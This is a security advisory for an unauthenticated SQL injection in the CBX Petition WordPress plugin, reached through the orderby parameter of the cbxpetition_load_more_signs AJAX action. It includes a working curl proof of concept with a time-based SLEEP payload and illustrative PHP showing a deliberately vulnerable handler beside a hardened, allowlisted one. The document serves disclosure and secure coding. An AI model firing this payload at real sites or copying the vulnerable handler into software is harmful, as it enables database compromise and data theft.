WPVDB-ID: E0FE5A53-8AE2-4B67-AC6E-4A8860E39035
Published: Dec 27, 2022

CBX Petition for WordPress <= 1.0.3 - Unauthenticated SQLi

2022-12-27 00:00:00 | cydave | wpscan.com
9
Tags: wordpress, sql injection, ajax action, unauthenticated users, security vulnerability, plugin

EPSS: 0.002 (Low), percentile 61.2%

The plugin does not properly sanitize or escape the orderby parameter before concatenating it into a SQL statement in the cbxpetition_load_more_signs AJAX action, which is reachable by unauthenticated users. Because ORDER BY takes an identifier rather than a bound value, the user-supplied string lands directly in the query, leading to a SQL injection.

PoC

1. Create and publish a new petition.
2. Invoke the following curl command, with the AJAX nonce supplied in the security parameter (left blank below), to induce a 5-second sleep. A response that arrives roughly five seconds late confirms the time-based blind injection through the orderby parameter:

   curl -i 'http://127.0.0.1:7777/wp-admin/admin-ajax.php?action=cbxpetition_load_more_signs&security=' \
     --data 'petition_id=2133&perpage=30&order=xxxxxxxxx&page=2&orderby=id AND (SELECT 4657 FROM (SELECT(SLEEP(5)))kvyf)'
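The pattern behind this class of bug, shown as an added example rather than the plugin's own code: the handler name, table name, column names and nonce action below are assumptions chosen only to match the shape of the PoC request. The first handler concatenates orderby and order straight into the query; the second keeps the same behaviour but restricts both identifiers to an allowlist and binds the numeric values with $wpdb->prepare().

```php
<?php
// Added illustration of the vulnerable pattern and its fix. Not CBX Petition's
// code: the handler names, table name, column names and nonce action are assumed.

// Vulnerable: orderby/order are attacker-controlled identifiers dropped into the SQL.
function cbx_example_load_more_signs_vulnerable() {
    global $wpdb;
    $table    = $wpdb->prefix . 'cbxpetition_signs';          // assumed table name
    $petition = absint( $_POST['petition_id'] ?? 0 );
    $perpage  = absint( $_POST['perpage'] ?? 30 );
    $page     = max( 1, absint( $_POST['page'] ?? 1 ) );
    $orderby  = $_POST['orderby'] ?? 'id';                     // never validated
    $order    = $_POST['order'] ?? 'DESC';                     // never validated
    $offset   = ( $page - 1 ) * $perpage;

    // ORDER BY cannot be bound as a placeholder, so concatenation here is the injection point.
    // orderby=id AND (SELECT ... SLEEP(5) ...) from the PoC lands verbatim in this string.
    $sql = "SELECT * FROM {$table} WHERE petition_id = {$petition} "
         . "ORDER BY {$orderby} {$order} LIMIT {$offset}, {$perpage}";

    wp_send_json_success( $wpdb->get_results( $sql ) );
}

// Hardened: verify the nonce, allowlist the identifiers, bind the values.
function cbx_example_load_more_signs_fixed() {
    global $wpdb;

    // Nonce action name is assumed. Note that a nonce handed to anonymous visitors
    // only proves the request came from the page; it is not input validation.
    check_ajax_referer( 'cbxpetition_nonce', 'security' );

    $table           = $wpdb->prefix . 'cbxpetition_signs';   // assumed table name
    $allowed_orderby = array( 'id', 'fname', 'date_created' ); // assumed column names

    $requested = isset( $_POST['orderby'] ) ? sanitize_key( wp_unslash( $_POST['orderby'] ) ) : 'id';
    $orderby   = in_array( $requested, $allowed_orderby, true ) ? $requested : 'id';
    $order     = ( isset( $_POST['order'] ) && strtoupper( $_POST['order'] ) === 'ASC' ) ? 'ASC' : 'DESC';

    $petition = absint( $_POST['petition_id'] ?? 0 );
    $perpage  = min( 100, max( 1, absint( $_POST['perpage'] ?? 30 ) ) );
    $page     = max( 1, absint( $_POST['page'] ?? 1 ) );
    $offset   = ( $page - 1 ) * $perpage;

    // Identifiers come only from the allowlist; every value is bound with a placeholder.
    $sql = $wpdb->prepare(
        "SELECT * FROM {$table} WHERE petition_id = %d ORDER BY {$orderby} {$order} LIMIT %d, %d",
        $petition,
        $offset,
        $perpage
    );

    wp_send_json_success( $wpdb->get_results( $sql ) );
}

// Register the fixed handler for both logged-in and anonymous callers (assumed hook names).
add_action( 'wp_ajax_cbxpetition_load_more_signs', 'cbx_example_load_more_signs_fixed' );
add_action( 'wp_ajax_nopriv_cbxpetition_load_more_signs', 'cbx_example_load_more_signs_fixed' );
```

The allowlist is the actual fix. Functions such as sanitize_sql_orderby() only check that the string looks like a column list, so an unexpected but syntactically valid column name still reaches the database; a fixed set of known columns is what makes the ORDER BY clause safe, and $wpdb->prepare() handles the numeric values that can be bound.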

CPE
Name: cbxpetition | Operator: eq | Version: *

